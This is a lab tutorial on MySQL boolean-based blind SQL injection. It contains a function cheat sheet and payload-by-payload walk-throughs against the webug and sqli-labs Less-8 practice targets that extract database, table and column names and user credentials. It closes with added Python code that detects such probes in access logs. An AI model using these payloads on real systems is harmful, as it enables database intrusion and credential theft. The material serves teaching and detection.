MySQL blind injection
like 'ro%' # tests whether the value begins with "ro" (ro, ro..., and so on)
regexp '^admin[a-z]' # matches names beginning with admin followed by a lowercase letter
if(condition,5,0) # returns 5 if the condition holds, otherwise 0
sleep(5) # delays execution of the SQL statement by 5 seconds
mid(a,b,c) # starting at position b, takes c characters of string a
substr(a,b,c) # starting at position b, takes c characters of string a
left(database(),1), database() # left(a,b) takes the first b characters of a, counting from the left
length(database())=8 # tests whether the length of the database name, database(), is 8
ord = ascii; ascii(x)=97 # tests whether the ASCII code of x is 97
These clauses can be combined with one another.
1. Boolean-based blind injection
Practice range: webug 4.0, boolean injection
1.1 Testing the injection point
id=2' and 1=1%23
id=2' and 1=2%23
%23 is the URL-encoded form of # (the comment marker)
1.2 order by
id=2' order by 2%23
1.3 Finding the echoed columns
union select 1,2%23
1.4 Determining the database name length
id=2' and length(database())=5%23
1.5 Determining the database name
and ascii(substr(database(),1,1))=119%23
or: and substr(database(),1,1)='w'%23
and ascii(substr(database(),2,1))=101%23
…
Database: webug
1.6 Determining table names
First, determine how many tables the database contains
and (select count(*) from information_schema.tables where table_schema=database())=7%23
The page displays correctly, so there are 7 tables
Determining the table name length
and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=9%23
This statement means: if the first row of the result (the first table) in this database has a name of length 9, the page displays correctly
Determining the table name
and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=101%23
This statement: the ASCII code of the first character of the second table's name in this database is 101
…
1.7 Determining columns
Determine how many fields (columns) the table has
and (select count(column_name) from information_schema.columns where table_name='env_list')>1%23
and (select count(*) from information_schema.columns where table_name='env_list')>1%23
8 columns (the screenshot was labeled incorrectly)
Determining the column name length
and (select length(column_name) from information_schema.columns where table_name='env_list' limit 5,1)=7%23
Determining the column name
and ascii(substr((select column_name from information_schema.columns where table_name='env_list' limit 5,1),1,1))>1%23
This statement takes the first character of the name of the 6th column in the env_list table and tests its ASCII code
1.8 Querying data
Determine how many rows the column holds
and (select count(envFlag) from env_list)>1%23
Determining the data length
and (select length(envFlag) from env_list limit 1,1)>1%23
takes the length of the second row in this column
Retrieving the value
and ascii(substr((select envFlag from env_list limit 1,1),1,1))>1%23
1.9 Summary
Boolean-based blind injection comes down to a conditional test: when the condition holds, the page displays correctly
1.10 sqli-labs Less-8 exercise
(1) Finding the injection point
http://127.0.0.1/sqlilabs/Less-8/?id=1' and 1=1%23
(2) Determining the number of columns
http://127.0.0.1/sqlilabs/Less-8/?id=1' order by 3%23
(3) Determining the database
Since the union query gave no result, try blind injection
Determine the length of the database name
http://127.0.0.1/sqlilabs/Less-8/?id=1' and length(database())=8 %23
Determine the database name
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr(database(),1,1)='s' %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr(database(),2,1)='e' %23
…
Database name: security
(4) Determining the tables
How many tables there are
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select count(*) from information_schema.tables where table_schema='security')=4 %23
Determine the length of each table name
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 0,1)=6 %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 1,1)=8 %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 2,1)=7 %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 3,1)=5 %23
Database: security
  Table 1: length 6
  Table 2: length 8
  Table 3: length 7
  Table 4: length 5
Determine each table name
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='e' %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),2,1)='m' %23
…
Database: security
  Table 1: emails
  Table 2: referers
  Table 3: uagents
  Table 4: users
You can run these through Burp and compare the response lengths to tell which requests returned the true page
(5) Determining the columns
From the table names, user data is likely stored in the users table
Determine how many fields (columns) the table has
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name = 'users')=3 %23
…
Determine the column name length
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(column_name) from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1)=2 %23
Determine the column names
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1)='i' %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),2,1)='d' %23
…
Database: security
  Table 1: emails, 3 columns
    id
    username
    password
  Table 2: referers
  Table 3: uagents
  Table 4: users
(6) Reading the data
Determine how many rows there are
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select count(username) from users)=13 %23
Determine the data length
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(username) from users limit 0,1)=4 %23
…
Running it through Burp gives:
Database: security
  Table 1: emails, 3 columns
    id
    username: lengths 4, 8, 5, 6, 6, 8, 6, 5, 6, 6, 6, 7, 6
    password
Reading the data
and ascii(substr((select username from users limit 0,1),1,1))=68%23
Run it through Burp once to obtain the data
The password is retrieved the same way
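From the defender's side, the following added example (not part of the original post) shows how the character-by-character probing used in both the webug and the Less-8 walk-throughs looks in a web server's access log: it decodes each query string, matches the boolean-blind fingerprints from the cheat sheet above (substr/length over database(), ascii(substr(...)), information_schema lookups), collapses the varying literals so every request of one enumeration run maps to the same template, and reports groups with many requests and two distinct response sizes (the true and the false page). The log lines, client addresses and the `analyze` function are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Fingerprints of the probes shown in the walk-throughs: substr/length over
# database(), ascii(substr(...)) comparisons and information_schema lookups.
PROBE_PATTERNS = [
    re.compile(r"\b(ascii|ord)\s*\(\s*(substr|mid|left)\s*\(", re.I),
    re.compile(r"\b(substr|mid|left|length)\s*\(\s*database\s*\(\s*\)", re.I),
    re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b", re.I),
]
# Numeric literals and compared string literals change from one probe to the next.
LITERAL = re.compile(r"=\s*'[^']*'|\d+")
# Combined-log-format request line (constructed format, no real server involved).
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\w+ (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)')

def is_probe(decoded_query: str) -> bool:
    """True when the decoded query string carries a blind-injection fingerprint."""
    return any(p.search(decoded_query) for p in PROBE_PATTERNS)

def normalize(decoded_query: str) -> str:
    """Replace the literals that vary between probes with '?', so every request
    of one character-by-character run maps to a single template."""
    template = LITERAL.sub(lambda m: "=?" if m.group().startswith("=") else "?", decoded_query)
    return re.sub(r"\s+", " ", template).strip().lower()

def analyze(lines, threshold=3):
    """Group probe requests by (client, path, template) and return the groups with
    at least `threshold` requests plus the distinct response sizes seen
    (a true page and a false page show up as two sizes)."""
    groups = defaultdict(lambda: {"count": 0, "sizes": set()})
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path, _, query = m.group("url").partition("?")
        decoded = unquote_plus(query)
        if not is_probe(decoded):
            continue
        g = groups[(m.group("ip"), path, normalize(decoded))]
        g["count"] += 1
        g["sizes"].add(int(m.group("size")))
    return {k: v for k, v in groups.items() if v["count"] >= threshold}

SAMPLE_LOG = [  # constructed access-log lines mirroring the Less-8 walk-through
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqlilabs/Less-8/?id=1 HTTP/1.1" 200 960',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqlilabs/Less-8/?id=1%27%20and%20length(database())=8%20%23 HTTP/1.1" 200 960',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqlilabs/Less-8/?id=1%27%20and%20substr(database(),1,1)=%27a%27%20%23 HTTP/1.1" 200 720',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /sqlilabs/Less-8/?id=1%27%20and%20substr(database(),1,1)=%27s%27%20%23 HTTP/1.1" 200 960',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /sqlilabs/Less-8/?id=1%27%20and%20substr(database(),2,1)=%27e%27%20%23 HTTP/1.1" 200 960',
    '10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /sqlilabs/Less-8/?id=2 HTTP/1.1" 200 955',
]
```

On the sample lines, `analyze(SAMPLE_LOG)` reports one group for 10.0.0.5: three `substr(database(),?,?)=?` probes with response sizes 720 and 960, while the single length() probe and the two plain requests fall below the threshold.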